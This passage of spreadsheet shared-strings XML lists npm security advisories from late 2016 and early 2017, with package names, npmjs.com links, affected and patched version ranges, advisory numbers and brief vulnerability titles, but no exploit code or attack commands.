    <t>2017-01-01T04:23:20+00:00</t>
  </si>
  <si>
    <t>phantomjs-cheniu</t>
  </si>
  <si>
    <t>https://www.npmjs.com/phantomjs-cheniu</t>
  </si>
  <si>
    <t>/advisories/269</t>
  </si>
  <si>
    <t>2017-01-01T04:23:14+00:00</t>
  </si>
  <si>
    <t>fis-parser-sass-bin</t>
  </si>
  <si>
    <t>https://www.npmjs.com/fis-parser-sass-bin</t>
  </si>
  <si>
    <t>/advisories/271</t>
  </si>
  <si>
    <t>2017-01-01T04:21:54+00:00</t>
  </si>
  <si>
    <t>poco</t>
  </si>
  <si>
    <t>https://www.npmjs.com/poco</t>
  </si>
  <si>
    <t>/advisories/263</t>
  </si>
  <si>
    <t>2017-01-01T04:21:37+00:00</t>
  </si>
  <si>
    <t>native-opencv</t>
  </si>
  <si>
    <t>https://www.npmjs.com/native-opencv</t>
  </si>
  <si>
    <t>/advisories/268</t>
  </si>
  <si>
    <t>2017-01-01T04:21:17+00:00</t>
  </si>
  <si>
    <t>co-cli-installer</t>
  </si>
  <si>
    <t>https://www.npmjs.com/co-cli-installer</t>
  </si>
  <si>
    <t>/advisories/266</t>
  </si>
  <si>
    <t>2017-01-01T04:20:31+00:00</t>
  </si>
  <si>
    <t>qbs</t>
  </si>
  <si>
    <t>https://www.npmjs.com/qbs</t>
  </si>
  <si>
    <t>/advisories/265</t>
  </si>
  <si>
    <t>2017-01-01T04:19:53+00:00</t>
  </si>
  <si>
    <t>clang-extra</t>
  </si>
  <si>
    <t>https://www.npmjs.com/clang-extra</t>
  </si>
  <si>
    <t>/advisories/256</t>
  </si>
  <si>
    <t>2017-01-01T04:18:11+00:00</t>
  </si>
  <si>
    <t>sfml</t>
  </si>
  <si>
    <t>https://www.npmjs.com/sfml</t>
  </si>
  <si>
    <t>/advisories/257</t>
  </si>
  <si>
    <t>2017-01-01T04:17:53+00:00</t>
  </si>
  <si>
    <t>xd-testing</t>
  </si>
  <si>
    <t>https://www.npmjs.com/xd-testing</t>
  </si>
  <si>
    <t>/advisories/248</t>
  </si>
  <si>
    <t>2017-01-01T04:17:35+00:00</t>
  </si>
  <si>
    <t>prebuild-lwip</t>
  </si>
  <si>
    <t>https://www.npmjs.com/prebuild-lwip</t>
  </si>
  <si>
    <t>/advisories/246</t>
  </si>
  <si>
    <t>2017-01-01T04:17:18+00:00</t>
  </si>
  <si>
    <t>webdriver-launcher</t>
  </si>
  <si>
    <t>https://www.npmjs.com/webdriver-launcher</t>
  </si>
  <si>
    <t>/advisories/253</t>
  </si>
  <si>
    <t>2017-01-01T04:16:54+00:00</t>
  </si>
  <si>
    <t>ntfserver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ntfserver</t>
  </si>
  <si>
    <t>/advisories/247</t>
  </si>
  <si>
    <t>2017-01-01T04:16:38+00:00</t>
  </si>
  <si>
    <t>frames-compiler</t>
  </si>
  <si>
    <t>https://www.npmjs.com/frames-compiler</t>
  </si>
  <si>
    <t>/advisories/252</t>
  </si>
  <si>
    <t>2017-01-01T04:16:17+00:00</t>
  </si>
  <si>
    <t>marionette-socket-host</t>
  </si>
  <si>
    <t>https://www.npmjs.com/marionette-socket-host</t>
  </si>
  <si>
    <t>/advisories/250</t>
  </si>
  <si>
    <t>2017-01-01T04:15:51+00:00</t>
  </si>
  <si>
    <t>node-air-sdk</t>
  </si>
  <si>
    <t>https://www.npmjs.com/node-air-sdk</t>
  </si>
  <si>
    <t>/advisories/254</t>
  </si>
  <si>
    <t>2017-01-01T04:15:36+00:00</t>
  </si>
  <si>
    <t>resourcehacker</t>
  </si>
  <si>
    <t>https://www.npmjs.com/resourcehacker</t>
  </si>
  <si>
    <t>/advisories/255</t>
  </si>
  <si>
    <t>2017-01-01T04:15:19+00:00</t>
  </si>
  <si>
    <t>grunt-images</t>
  </si>
  <si>
    <t>https://www.npmjs.com/grunt-images</t>
  </si>
  <si>
    <t>/advisories/243</t>
  </si>
  <si>
    <t>2017-01-01T04:14:35+00:00</t>
  </si>
  <si>
    <t>slimerjs-edge</t>
  </si>
  <si>
    <t>https://www.npmjs.com/slimerjs-edge</t>
  </si>
  <si>
    <t>/advisories/244</t>
  </si>
  <si>
    <t>2017-01-01T04:14:03+00:00</t>
  </si>
  <si>
    <t>jstestdriver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jstestdriver</t>
  </si>
  <si>
    <t>/advisories/233</t>
  </si>
  <si>
    <t>2017-01-01T04:13:46+00:00</t>
  </si>
  <si>
    <t>cmake</t>
  </si>
  <si>
    <t>https://www.npmjs.com/cmake</t>
  </si>
  <si>
    <t>/advisories/234</t>
  </si>
  <si>
    <t>2017-01-01T04:13:31+00:00</t>
  </si>
  <si>
    <t>node-bsdiff-android</t>
  </si>
  <si>
    <t>https://www.npmjs.com/node-bsdiff-android</t>
  </si>
  <si>
    <t>/advisories/236</t>
  </si>
  <si>
    <t>2017-01-01T04:13:17+00:00</t>
  </si>
  <si>
    <t>node-thulac</t>
  </si>
  <si>
    <t>https://www.npmjs.com/node-thulac</t>
  </si>
  <si>
    <t>/advisories/238</t>
  </si>
  <si>
    <t>2017-01-01T04:13:00+00:00</t>
  </si>
  <si>
    <t>redis-srvr</t>
  </si>
  <si>
    <t>https://www.npmjs.com/redis-srvr</t>
  </si>
  <si>
    <t>/advisories/241</t>
  </si>
  <si>
    <t>2017-01-01T04:12:33+00:00</t>
  </si>
  <si>
    <t>js-given</t>
  </si>
  <si>
    <t>https://www.npmjs.com/js-given</t>
  </si>
  <si>
    <t>&lt;0.0.18</t>
  </si>
  <si>
    <t>&gt;=0.0.18</t>
  </si>
  <si>
    <t>/advisories/237</t>
  </si>
  <si>
    <t>2017-01-01T04:12:22+00:00</t>
  </si>
  <si>
    <t>haxe-dev</t>
  </si>
  <si>
    <t>https://www.npmjs.com/haxe-dev</t>
  </si>
  <si>
    <t>/advisories/239</t>
  </si>
  <si>
    <t>2017-01-01T04:12:04+00:00</t>
  </si>
  <si>
    <t>grunt-ccompiler</t>
  </si>
  <si>
    <t>https://www.npmjs.com/grunt-ccompiler</t>
  </si>
  <si>
    <t>/advisories/242</t>
  </si>
  <si>
    <t>2017-01-01T04:11:20+00:00</t>
  </si>
  <si>
    <t>broccoli-closure</t>
  </si>
  <si>
    <t>https://www.npmjs.com/broccoli-closure</t>
  </si>
  <si>
    <t>/advisories/231</t>
  </si>
  <si>
    <t>2017-01-01T04:08:42+00:00</t>
  </si>
  <si>
    <t>scalajs-standalone-bin</t>
  </si>
  <si>
    <t>https://www.npmjs.com/scalajs-standalone-bin</t>
  </si>
  <si>
    <t>/advisories/232</t>
  </si>
  <si>
    <t>2017-01-01T04:08:35+00:00</t>
  </si>
  <si>
    <t>dwebp-bin</t>
  </si>
  <si>
    <t>https://www.npmjs.com/dwebp-bin</t>
  </si>
  <si>
    <t>/advisories/223</t>
  </si>
  <si>
    <t>2017-01-01T04:05:59+00:00</t>
  </si>
  <si>
    <t>apk-parser2</t>
  </si>
  <si>
    <t>https://www.npmjs.com/apk-parser2</t>
  </si>
  <si>
    <t>/advisories/225</t>
  </si>
  <si>
    <t>2017-01-01T04:05:26+00:00</t>
  </si>
  <si>
    <t>jvminstall</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jvminstall</t>
  </si>
  <si>
    <t>/advisories/228</t>
  </si>
  <si>
    <t>2017-01-01T04:05:18+00:00</t>
  </si>
  <si>
    <t>install-g-test</t>
  </si>
  <si>
    <t>https://www.npmjs.com/install-g-test</t>
  </si>
  <si>
    <t>/advisories/226</t>
  </si>
  <si>
    <t>2017-01-01T04:02:03+00:00</t>
  </si>
  <si>
    <t>nw-with-arm</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nw-with-arm</t>
  </si>
  <si>
    <t>/advisories/224</t>
  </si>
  <si>
    <t>2017-01-01T04:01:45+00:00</t>
  </si>
  <si>
    <t>selenium-wrapper</t>
  </si>
  <si>
    <t>https://www.npmjs.com/selenium-wrapper</t>
  </si>
  <si>
    <t>/advisories/227</t>
  </si>
  <si>
    <t>2017-01-01T04:01:30+00:00</t>
  </si>
  <si>
    <t>scala-bin</t>
  </si>
  <si>
    <t>https://www.npmjs.com/scala-bin</t>
  </si>
  <si>
    <t>/advisories/229</t>
  </si>
  <si>
    <t>2017-01-01T04:01:11+00:00</t>
  </si>
  <si>
    <t>mystem3</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mystem3</t>
  </si>
  <si>
    <t>&lt;=1.0.7</t>
  </si>
  <si>
    <t>&gt;1.0.7</t>
  </si>
  <si>
    <t>/advisories/230</t>
  </si>
  <si>
    <t>2017-01-01T04:00:47+00:00</t>
  </si>
  <si>
    <t>headless-browser-lite</t>
  </si>
  <si>
    <t>https://www.npmjs.com/headless-browser-lite</t>
  </si>
  <si>
    <t>&lt;2015.4.18-a</t>
  </si>
  <si>
    <t>&gt;=2015.4.18-a</t>
  </si>
  <si>
    <t>/advisories/222</t>
  </si>
  <si>
    <t>2017-01-01T03:59:57+00:00</t>
  </si>
  <si>
    <t>selenium-chromedriver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/selenium-chromedriver</t>
  </si>
  <si>
    <t>/advisories/221</t>
  </si>
  <si>
    <t>2017-01-01T03:59:47+00:00</t>
  </si>
  <si>
    <t>macaca-chromedriver-zxa</t>
  </si>
  <si>
    <t>https://www.npmjs.com/macaca-chromedriver-zxa</t>
  </si>
  <si>
    <t>/advisories/212</t>
  </si>
  <si>
    <t>2017-01-01T03:59:28+00:00</t>
  </si>
  <si>
    <t>nodeschnaps</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nodeschnaps</t>
  </si>
  <si>
    <t>&lt;1.0.3</t>
  </si>
  <si>
    <t>&gt;=1.0.3</t>
  </si>
  <si>
    <t>/advisories/217</t>
  </si>
  <si>
    <t>2017-01-01T03:59:19+00:00</t>
  </si>
  <si>
    <t>fibjs</t>
  </si>
  <si>
    <t>https://www.npmjs.com/fibjs</t>
  </si>
  <si>
    <t>/advisories/216</t>
  </si>
  <si>
    <t>2017-01-01T03:58:58+00:00</t>
  </si>
  <si>
    <t>atom-node-module-installer</t>
  </si>
  <si>
    <t>https://www.npmjs.com/atom-node-module-installer</t>
  </si>
  <si>
    <t>/advisories/213</t>
  </si>
  <si>
    <t>2017-01-01T03:58:39+00:00</t>
  </si>
  <si>
    <t>pennyworth</t>
  </si>
  <si>
    <t>https://www.npmjs.com/pennyworth</t>
  </si>
  <si>
    <t>/advisories/214</t>
  </si>
  <si>
    <t>2017-01-01T03:57:10+00:00</t>
  </si>
  <si>
    <t>node-browser</t>
  </si>
  <si>
    <t>https://www.npmjs.com/node-browser</t>
  </si>
  <si>
    <t>/advisories/219</t>
  </si>
  <si>
    <t>2017-01-01T03:56:45+00:00</t>
  </si>
  <si>
    <t>box2d-native</t>
  </si>
  <si>
    <t>https://www.npmjs.com/box2d-native</t>
  </si>
  <si>
    <t>/advisories/218</t>
  </si>
  <si>
    <t>2017-01-01T03:56:23+00:00</t>
  </si>
  <si>
    <t>openframe-image</t>
  </si>
  <si>
    <t>https://www.npmjs.com/openframe-image</t>
  </si>
  <si>
    <t>/advisories/215</t>
  </si>
  <si>
    <t>2017-01-01T03:56:03+00:00</t>
  </si>
  <si>
    <t>curses</t>
  </si>
  <si>
    <t>https://www.npmjs.com/curses</t>
  </si>
  <si>
    <t>/advisories/210</t>
  </si>
  <si>
    <t>2017-01-01T02:29:36+00:00</t>
  </si>
  <si>
    <t>httpsync</t>
  </si>
  <si>
    <t>https://www.npmjs.com/httpsync</t>
  </si>
  <si>
    <t>/advisories/211</t>
  </si>
  <si>
    <t>2017-01-01T02:29:22+00:00</t>
  </si>
  <si>
    <t>bionode-sra</t>
  </si>
  <si>
    <t>https://www.npmjs.com/bionode-sra</t>
  </si>
  <si>
    <t>/advisories/205</t>
  </si>
  <si>
    <t>2017-01-01T02:29:11+00:00</t>
  </si>
  <si>
    <t>dalek-browser-ie-canary</t>
  </si>
  <si>
    <t>https://www.npmjs.com/dalek-browser-ie-canary</t>
  </si>
  <si>
    <t>/advisories/202</t>
  </si>
  <si>
    <t>2017-01-01T02:29:00+00:00</t>
  </si>
  <si>
    <t>strider-sauce</t>
  </si>
  <si>
    <t>https://www.npmjs.com/strider-sauce</t>
  </si>
  <si>
    <t>&lt;=0.6.3</t>
  </si>
  <si>
    <t>&gt;0.6.3</t>
  </si>
  <si>
    <t>/advisories/206</t>
  </si>
  <si>
    <t>2017-01-01T02:28:49+00:00</t>
  </si>
  <si>
    <t>unicode-json</t>
  </si>
  <si>
    <t>https://www.npmjs.com/unicode-json</t>
  </si>
  <si>
    <t>&gt;= 2.0.0</t>
  </si>
  <si>
    <t>/advisories/203</t>
  </si>
  <si>
    <t>2017-01-01T02:28:37+00:00</t>
  </si>
  <si>
    <t>chromedriver126</t>
  </si>
  <si>
    <t>https://www.npmjs.com/chromedriver126</t>
  </si>
  <si>
    <t>/advisories/201</t>
  </si>
  <si>
    <t>2017-01-01T02:28:23+00:00</t>
  </si>
  <si>
    <t>robot-js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/robot-js</t>
  </si>
  <si>
    <t>/advisories/208</t>
  </si>
  <si>
    <t>2017-01-01T02:28:15+00:00</t>
  </si>
  <si>
    <t>openframe-glslviewer</t>
  </si>
  <si>
    <t>https://www.npmjs.com/openframe-glslviewer</t>
  </si>
  <si>
    <t>/advisories/207</t>
  </si>
  <si>
    <t>2017-01-01T02:27:58+00:00</t>
  </si>
  <si>
    <t>grunt-webdriver-qunit</t>
  </si>
  <si>
    <t>https://www.npmjs.com/grunt-webdriver-qunit</t>
  </si>
  <si>
    <t>/advisories/209</t>
  </si>
  <si>
    <t>2017-01-01T02:27:48+00:00</t>
  </si>
  <si>
    <t>dalek-browser-ie</t>
  </si>
  <si>
    <t>https://www.npmjs.com/dalek-browser-ie</t>
  </si>
  <si>
    <t>/advisories/199</t>
  </si>
  <si>
    <t>2017-01-01T01:47:59+00:00</t>
  </si>
  <si>
    <t>dalek-browser-chrome</t>
  </si>
  <si>
    <t>https://www.npmjs.com/dalek-browser-chrome</t>
  </si>
  <si>
    <t>/advisories/200</t>
  </si>
  <si>
    <t>2017-01-01T01:47:48+00:00</t>
  </si>
  <si>
    <t>air-sdk</t>
  </si>
  <si>
    <t>https://www.npmjs.com/air-sdk</t>
  </si>
  <si>
    <t>/advisories/177</t>
  </si>
  <si>
    <t>2017-01-01T01:47:19+00:00</t>
  </si>
  <si>
    <t>haxe</t>
  </si>
  <si>
    <t>https://www.npmjs.com/haxe</t>
  </si>
  <si>
    <t>/advisories/193</t>
  </si>
  <si>
    <t>2017-01-01T01:43:37+00:00</t>
  </si>
  <si>
    <t>webdrvr</t>
  </si>
  <si>
    <t>https://www.npmjs.com/webdrvr</t>
  </si>
  <si>
    <t>/advisories/176</t>
  </si>
  <si>
    <t>2017-01-01T01:43:16+00:00</t>
  </si>
  <si>
    <t>webrtc-native</t>
  </si>
  <si>
    <t>https://www.npmjs.com/webrtc-native</t>
  </si>
  <si>
    <t>/advisories/186</t>
  </si>
  <si>
    <t>2017-01-01T01:42:58+00:00</t>
  </si>
  <si>
    <t>sauce-connect</t>
  </si>
  <si>
    <t>https://www.npmjs.com/sauce-connect</t>
  </si>
  <si>
    <t>/advisories/192</t>
  </si>
  <si>
    <t>2017-01-01T01:42:01+00:00</t>
  </si>
  <si>
    <t>arrayfire-js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/arrayfire-js</t>
  </si>
  <si>
    <t>/advisories/197</t>
  </si>
  <si>
    <t>2017-01-01T01:40:41+00:00</t>
  </si>
  <si>
    <t>cobalt-cli</t>
  </si>
  <si>
    <t>https://www.npmjs.com/cobalt-cli</t>
  </si>
  <si>
    <t>/advisories/194</t>
  </si>
  <si>
    <t>2017-01-01T01:40:25+00:00</t>
  </si>
  <si>
    <t>imageoptim</t>
  </si>
  <si>
    <t>https://www.npmjs.com/imageoptim</t>
  </si>
  <si>
    <t>/advisories/198</t>
  </si>
  <si>
    <t>2017-01-01T01:38:49+00:00</t>
  </si>
  <si>
    <t>jdf-sass</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jdf-sass</t>
  </si>
  <si>
    <t>/advisories/184</t>
  </si>
  <si>
    <t>2016-12-21T23:50:49+00:00</t>
  </si>
  <si>
    <t>ipip</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ipip</t>
  </si>
  <si>
    <t>/advisories/182</t>
  </si>
  <si>
    <t>2016-12-21T23:49:49+00:00</t>
  </si>
  <si>
    <t>ibapi</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ibapi</t>
  </si>
  <si>
    <t>/advisories/188</t>
  </si>
  <si>
    <t>2016-12-21T23:49:12+00:00</t>
  </si>
  <si>
    <t>jser-stat</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jser-stat</t>
  </si>
  <si>
    <t>/advisories/185</t>
  </si>
  <si>
    <t>2016-12-21T23:46:48+00:00</t>
  </si>
  <si>
    <t>prince</t>
  </si>
  <si>
    <t>https://www.npmjs.com/prince</t>
  </si>
  <si>
    <t>&lt;=1.4.6</t>
  </si>
  <si>
    <t>/advisories/190</t>
  </si>
  <si>
    <t>2016-12-21T23:44:26+00:00</t>
  </si>
  <si>
    <t>cue-sdk-node</t>
  </si>
  <si>
    <t>https://www.npmjs.com/cue-sdk-node</t>
  </si>
  <si>
    <t>/advisories/175</t>
  </si>
  <si>
    <t>2016-12-18T22:51:41+00:00</t>
  </si>
  <si>
    <t>selenium-binaries</t>
  </si>
  <si>
    <t>https://www.npmjs.com/selenium-binaries</t>
  </si>
  <si>
    <t>/advisories/166</t>
  </si>
  <si>
    <t>2016-12-18T22:51:25+00:00</t>
  </si>
  <si>
    <t>nw</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nw</t>
  </si>
  <si>
    <t>&gt;0.23.6-1</t>
  </si>
  <si>
    <t>&lt;=0.23.6-1</t>
  </si>
  <si>
    <t>/advisories/179</t>
  </si>
  <si>
    <t>2016-12-18T22:51:00+00:00</t>
  </si>
  <si>
    <t>wasdk</t>
  </si>
  <si>
    <t>https://www.npmjs.com/wasdk</t>
  </si>
  <si>
    <t>/advisories/180</t>
  </si>
  <si>
    <t>2016-12-18T22:50:43+00:00</t>
  </si>
  <si>
    <t>macaca-chromedriver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/macaca-chromedriver</t>
  </si>
  <si>
    <t>&lt;1.0.29</t>
  </si>
  <si>
    <t>&gt;=1.0.29</t>
  </si>
  <si>
    <t>/advisories/178</t>
  </si>
  <si>
    <t>2016-12-18T22:48:43+00:00</t>
  </si>
  <si>
    <t>libxl</t>
  </si>
  <si>
    <t>https://www.npmjs.com/libxl</t>
  </si>
  <si>
    <t>/advisories/181</t>
  </si>
  <si>
    <t>2016-12-18T22:48:30+00:00</t>
  </si>
  <si>
    <t>dalek-browser-chrome-canary</t>
  </si>
  <si>
    <t>https://www.npmjs.com/dalek-browser-chrome-canary</t>
  </si>
  <si>
    <t>/advisories/165</t>
  </si>
  <si>
    <t>2016-12-18T22:47:57+00:00</t>
  </si>
  <si>
    <t>closure-util</t>
  </si>
  <si>
    <t>https://www.npmjs.com/closure-util</t>
  </si>
  <si>
    <t>/advisories/169</t>
  </si>
  <si>
    <t>2016-12-18T22:47:42+00:00</t>
  </si>
  <si>
    <t>closurecompiler</t>
  </si>
  <si>
    <t>https://www.npmjs.com/closurecompiler</t>
  </si>
  <si>
    <t>/advisories/168</t>
  </si>
  <si>
    <t>2016-12-18T22:47:19+00:00</t>
  </si>
  <si>
    <t>steroids</t>
  </si>
  <si>
    <t>https://www.npmjs.com/steroids</t>
  </si>
  <si>
    <t>/advisories/173</t>
  </si>
  <si>
    <t>2016-12-18T22:47:03+00:00</t>
  </si>
  <si>
    <t>nodewebkit</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nodewebkit</t>
  </si>
  <si>
    <t>/advisories/160</t>
  </si>
  <si>
    <t>2016-12-18T22:46:48+00:00</t>
  </si>
  <si>
    <t>chromedriver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/chromedriver</t>
  </si>
  <si>
    <t>&lt;2.26.1</t>
  </si>
  <si>
    <t>&gt;=2.26.1</t>
  </si>
  <si>
    <t>/advisories/161</t>
  </si>
  <si>
    <t>2016-12-18T22:46:36+00:00</t>
  </si>
  <si>
    <t>unicode</t>
  </si>
  <si>
    <t>https://www.npmjs.com/unicode</t>
  </si>
  <si>
    <t>&lt; 9.0.0</t>
  </si>
  <si>
    <t>&gt;= 9.0.0</t>
  </si>
  <si>
    <t>/advisories/163</t>
  </si>
  <si>
    <t>2016-12-18T22:46:16+00:00</t>
  </si>
  <si>
    <t>ibm_db</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ibm_db</t>
  </si>
  <si>
    <t>/advisories/278</t>
  </si>
  <si>
    <t>2016-12-16T00:27:09+00:00</t>
  </si>
  <si>
    <t>fuseki</t>
  </si>
  <si>
    <t>https://www.npmjs.com/fuseki</t>
  </si>
  <si>
    <t>/advisories/251</t>
  </si>
  <si>
    <t>2016-12-16T00:26:26+00:00</t>
  </si>
  <si>
    <t>kindlegen</t>
  </si>
  <si>
    <t>https://www.npmjs.com/kindlegen</t>
  </si>
  <si>
    <t>/advisories/245</t>
  </si>
  <si>
    <t>2016-12-16T00:25:54+00:00</t>
  </si>
  <si>
    <t>apk-parser3</t>
  </si>
  <si>
    <t>https://www.npmjs.com/apk-parser3</t>
  </si>
  <si>
    <t>&lt;0.1.3</t>
  </si>
  <si>
    <t>/advisories/240</t>
  </si>
  <si>
    <t>2016-12-16T00:25:27+00:00</t>
  </si>
  <si>
    <t>baryton-saxophone</t>
  </si>
  <si>
    <t>https://www.npmjs.com/baryton-saxophone</t>
  </si>
  <si>
    <t>/advisories/235</t>
  </si>
  <si>
    <t>2016-12-16T00:24:46+00:00</t>
  </si>
  <si>
    <t>mongodb-instance</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mongodb-instance</t>
  </si>
  <si>
    <t>&lt;0.0.3</t>
  </si>
  <si>
    <t>&gt;=0.0.3</t>
  </si>
  <si>
    <t>/advisories/220</t>
  </si>
  <si>
    <t>2016-12-16T00:24:26+00:00</t>
  </si>
  <si>
    <t>bkjs-wand</t>
  </si>
  <si>
    <t>https://www.npmjs.com/bkjs-wand</t>
  </si>
  <si>
    <t>&lt;0.3.2</t>
  </si>
  <si>
    <t>&gt;=0.3.2</t>
  </si>
  <si>
    <t>/advisories/189</t>
  </si>
  <si>
    <t>2016-12-16T00:24:02+00:00</t>
  </si>
  <si>
    <t>pngcrush-installer</t>
  </si>
  <si>
    <t>https://www.npmjs.com/pngcrush-installer</t>
  </si>
  <si>
    <t>&lt;1.8.10</t>
  </si>
  <si>
    <t>&gt;=1.8.10</t>
  </si>
  <si>
    <t>/advisories/187</t>
  </si>
  <si>
    <t>2016-12-16T00:23:52+00:00</t>
  </si>
  <si>
    <t>embedza</t>
  </si>
  <si>
    <t>https://www.npmjs.com/embedza</t>
  </si>
  <si>
    <t>&lt;1.2.4</t>
  </si>
  <si>
    <t>/advisories/183</t>
  </si>
  <si>
    <t>2016-12-16T00:23:22+00:00</t>
  </si>
  <si>
    <t>geoip-lite-country</t>
  </si>
  <si>
    <t>https://www.npmjs.com/geoip-lite-country</t>
  </si>
  <si>
    <t>&lt;1.1.4</t>
  </si>
  <si>
    <t>&gt;=1.1.4</t>
  </si>
  <si>
    <t>/advisories/171</t>
  </si>
  <si>
    <t>2016-12-16T00:22:56+00:00</t>
  </si>
  <si>
    <t>product-monitor</t>
  </si>
  <si>
    <t>https://www.npmjs.com/product-monitor</t>
  </si>
  <si>
    <t>&lt;2.2.5</t>
  </si>
  <si>
    <t>&gt;=2.2.5</t>
  </si>
  <si>
    <t>/advisories/204</t>
  </si>
  <si>
    <t>2016-12-16T00:22:03+00:00</t>
  </si>
  <si>
    <t>install-nw</t>
  </si>
  <si>
    <t>https://www.npmjs.com/install-nw</t>
  </si>
  <si>
    <t>&lt;1.1.5</t>
  </si>
  <si>
    <t>/advisories/196</t>
  </si>
  <si>
    <t>2016-12-16T00:21:23+00:00</t>
  </si>
  <si>
    <t>operadriver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/operadriver</t>
  </si>
  <si>
    <t>/advisories/195</t>
  </si>
  <si>
    <t>2016-12-16T00:21:12+00:00</t>
  </si>
  <si>
    <t>apk-parser</t>
  </si>
  <si>
    <t>https://www.npmjs.com/apk-parser</t>
  </si>
  <si>
    <t>&lt;0.1.6</t>
  </si>
  <si>
    <t>&gt;=0.1.6</t>
  </si>
  <si>
    <t>/advisories/156</t>
  </si>
  <si>
    <t>2016-12-16T00:20:49+00:00</t>
  </si>
  <si>
    <t>go-ipfs-dep</t>
  </si>
  <si>
    <t>https://www.npmjs.com/go-ipfs-dep</t>
  </si>
  <si>
    <t>&lt;0.4.4</t>
  </si>
  <si>
    <t>&gt;=0.4.4</t>
  </si>
  <si>
    <t>/advisories/174</t>
  </si>
  <si>
    <t>2016-12-16T00:19:37+00:00</t>
  </si>
  <si>
    <t>iedriver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/iedriver</t>
  </si>
  <si>
    <t>/advisories/150</t>
  </si>
  <si>
    <t>2016-12-07T16:41:46+00:00</t>
  </si>
  <si>
    <t>bitty</t>
  </si>
  <si>
    <t>https://www.npmjs.com/bitty</t>
  </si>
  <si>
    <t>Authentication bypass</t>
  </si>
  <si>
    <t>/advisories/151</t>
  </si>
  <si>
    <t>2016-12-06T01:10:10+00:00</t>
  </si>
  <si>
    <t>passport-azure-ad</t>
  </si>
  <si>
    <t>https://www.npmjs.com/passport-azure-ad</t>
  </si>
  <si>
    <t>&gt;= 1.0.0 &lt; 1.4.6 || 2.0.0</t>
  </si>
  <si>
    <t>&gt;= 1.4.6 &lt; 2.0.0 || &gt;= 2.0.1</t>
  </si>
  <si>
    <t>/advisories/170</t>
  </si>
  <si>
    <t>2016-12-06T01:09:10+00:00</t>
  </si>
  <si>
    <t>galenframework-cli</t>
  </si>
  <si>
    <t>https://www.npmjs.com/galenframework-cli</t>
  </si>
  <si>
    <t>&lt;2.3.1</t>
  </si>
  <si>
    <t>&gt;=2.3.1</t>
  </si>
  <si>
    <t>/advisories/164</t>
  </si>
  <si>
    <t>2016-12-06T01:08:20+00:00</t>
  </si>
  <si>
    <t>selenium-download</t>
  </si>
  <si>
    <t>https://www.npmjs.com/selenium-download</t>
  </si>
  <si>
    <t>&lt;2.0.7</t>
  </si>
  <si>
    <t>&gt;=2.0.7</t>
  </si>
  <si>
    <t>/advisories/167</t>
  </si>
  <si>
    <t>2016-12-06T01:05:40+00:00</t>
  </si>
  <si>
    <t>aerospike</t>
  </si>
  <si>
    <t>https://www.npmjs.com/aerospike</t>
  </si>
  <si>
    <t>&lt;2.4.2</t>
  </si>
  <si>
    <t>&gt;=2.4.2</t>
  </si>
  <si>
    <t>/advisories/162</t>
  </si>
  <si>
    <t>2016-12-06T01:04:28+00:00</t>
  </si>
  <si>
    <t>appium-chromedriver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/appium-chromedriver</t>
  </si>
  <si>
    <t>&lt;2.9.4</t>
  </si>
  <si>
    <t>&gt;=2.9.4</t>
  </si>
  <si>
    <t>Improper Escaping of Bound Arrays</t>
  </si>
  <si>
    <t>/advisories/102</t>
  </si>
  <si>
    <t>2016-10-31T20:33:10+00:00</t>
  </si>
  <si>
    <t>sequelize</t>
  </si>
  <si>
    <t>https://www.npmjs.com/sequelize</t>
  </si>
  <si>
    <t>&lt;=3.19.3</t>
  </si>
  <si>
    <t>&gt;=3.20.0</t>
  </si>
  <si>
    <t>Forgeable Public/Private Tokens</t>
  </si>
  <si>
    <t>/advisories/87</t>
  </si>
  <si>
    <t>2016-10-31T20:32:51+00:00</t>
  </si>
  <si>
    <t>jwt-simple</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jwt-simple</t>
  </si>
  <si>
    <t>&lt;=0.3.0</t>
  </si>
  <si>
    <t>&gt;=0.3.1</t>
  </si>
  <si>
    <t>SQL Injection</t>
  </si>
  <si>
    <t>/advisories/113</t>
  </si>
  <si>
    <t>2016-10-31T20:32:24+00:00</t>
  </si>
  <si>
    <t>&lt;= 1.7.0-alpha2</t>
  </si>
  <si>
    <t>&gt;= 1.7.0-alpha3</t>
  </si>
  <si>
    <t>Potential SQL Injection</t>
  </si>
  <si>
    <t>/advisories/109</t>
  </si>
  <si>
    <t>2016-10-31T20:32:07+00:00</t>
  </si>
  <si>
    <t>&lt;= 2.1.3</t>
  </si>
  <si>
    <t>&gt;= 3.0.0</t>
  </si>
  <si>
    <t>Resources Downloaded over Insecure Protocol</t>
  </si>
  <si>
    <t>/advisories/116</t>
  </si>
  <si>
    <t>2016-10-31T20:31:53+00:00</t>
  </si>
  <si>
    <t>igniteui</t>
  </si>
  <si>
    <t>https://www.npmjs.com/igniteui</t>
  </si>
  <si>
    <t>/advisories/115</t>
  </si>
  <si>
    <t>2016-10-31T20:31:32+00:00</t>
  </si>
  <si>
    <t>waterline-sequel</t>
  </si>
  <si>
    <t>https://www.npmjs.com/waterline-sequel</t>
  </si>
  <si>
    <t>0.5.0</t>
  </si>
  <si>
    <t>&gt;= 0.5.1</t>
  </si>
  <si>
    <t>/advisories/112</t>
  </si>
  <si>
    <t>2016-10-31T20:31:20+00:00</t>
  </si>
  <si>
    <t>&lt;= 3.16.0</t>
  </si>
  <si>
    <t>&gt;= 3.17.0</t>
  </si>
  <si>
    <t>Broken CORS</t>
  </si>
  <si>
    <t>/advisories/148</t>
  </si>
  <si>
    <t>2016-10-20T15:20:55+00:00</t>
  </si>
  <si>
    <t>sails</t>
  </si>
